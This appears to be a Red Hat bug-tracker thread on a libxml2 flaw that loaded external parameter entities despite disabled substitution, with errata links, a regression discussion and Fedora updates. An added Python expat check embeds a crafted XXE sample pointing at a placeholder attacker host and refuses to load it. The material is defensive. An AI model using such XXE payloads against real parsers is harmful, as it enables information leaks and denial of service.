It was discovered that libxml2 loaded external parameter entities even when entity substitution was disabled. A remote attacker able to provide a specially crafted XML file to an application linked against libxml2 could use this flaw to conduct XML External Entity (XXE) attacks, possibly resulting in a denial of service or an information leak on the system.
It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substitution in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.
This issue was discovered by Daniel P. Berrange of Red Hat.
This issue is related to the handling of external parameter entities. Even when libxml2 was instructed to parse an XML document without performing entity substitutions (i.e. when the parser was run without the XML_PARSE_NOENT option, which is the default), libxml2 loaded external entities, which could lead to some XML eXternal Entity (XXE) attacks.
A similar problem was previously corrected in libxml2 for general entities via:
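The property the fix restores is that a parser with entity substitution disabled must never try to load an external parameter entity at all. The following is an added example, not code from this bug report or from libxml2: it uses Python's standard-library expat parser as a stand-in, with a constructed document that references an external parameter entity from the DOCTYPE internal subset (the URL is a placeholder and is never fetched), and records which external resources the parser asks for in each mode.

```python
import xml.parsers.expat as expat

# Constructed sample: an external parameter entity declared and referenced in
# the doctype internal subset. The host is a placeholder, never contacted.
XXE_SAMPLE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE doc [\n'
    '  <!ENTITY % ext SYSTEM "http://attacker.invalid/evil.dtd">\n'
    '  %ext;\n'
    ']>\n'
    '<doc>hello</doc>\n'
)


def parse_and_record_external_refs(xml_text, param_entity_mode):
    """Parse xml_text with the given parameter-entity mode.

    Returns (requested, ok): the list of external entity system IDs the
    parser asked to load, and whether the parse completed. The handler
    refuses every request (returns 0), so nothing is ever fetched and a
    refused request aborts the parse with an ExpatError."""
    requested = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(param_entity_mode)

    def refuse(context, base, system_id, public_id):
        requested.append(system_id)
        return 0  # 0 tells expat to abort instead of resolving the entity

    parser.ExternalEntityRefHandler = refuse
    try:
        parser.Parse(xml_text, True)
        ok = True
    except expat.ExpatError:
        ok = False
    return requested, ok


def external_param_entities_requested(xml_text, substitute):
    """With substitution disabled (the safe default, analogous to omitting
    XML_PARSE_NOENT in libxml2) the result must be an empty list; with it
    enabled, the parser attempts to load the external parameter entity."""
    mode = (expat.XML_PARAM_ENTITY_PARSING_ALWAYS if substitute
            else expat.XML_PARAM_ENTITY_PARSING_NEVER)
    requested, _ok = parse_and_record_external_refs(xml_text, mode)
    return requested
```

A refusing ExternalEntityRefHandler like this is a cheap defence-in-depth check for applications that never need external entities, independent of which parser library is underneath.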
This issue has been addressed in the following products:
Red Hat Enterprise Linux 6
Via RHSA-2014:0513 https://rhn.redhat.com/errata/RHSA-2014-0513.html
Ubuntu just released http://www.ubuntu.com/usn/usn-2214-2/ to note a regression in the upstream fix for this issue, described as:
USN-2214-1 fixed vulnerabilities in libxml2. The upstream fix introduced a
regression when using xmllint with the --postvalid option. This update
fixes the problem.
Given that we have fixed in RHEL6, do we suffer from the same regression? See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a patch attached (presumably what was used in Ubuntu); also see the upstream report here:
Vincent, I think we do have the same regression. See https://bugzilla.redhat.com/show_bug.cgi?id=1104864 .
Created libxml2 tracking bugs for this issue:
Affects: fedora-all [bug 1107556]
Created mingw-libxml2 tracking bugs for this issue:
Affects: fedora-all [bug 1107557]
(In reply to Vincent Danen from comment #22)
> Given that we have fixed in RHEL6, do we suffer from the same regression?
> See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and
> https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a
> patch attached (presumably what was used in Ubuntu); also see the upstream
> report here:
This is a bug we've introduced with this security patch, but from what I can tell it's not a new security issue. As Michael Chapman pointed out in comment 24, this is already being handled in bug 1104864.
Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.
Created mingw32-libxml2 tracking bugs for this issue:
Affects: epel-7 [bug 1191425]
Bug 915149 comment 8 has notes on a related issue that affected general external entities.
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2015:0749 https://rhn.redhat.com/errata/RHSA-2015-0749.html
libxml2-2.9.1-7.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
libxml2-2.9.1-4.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.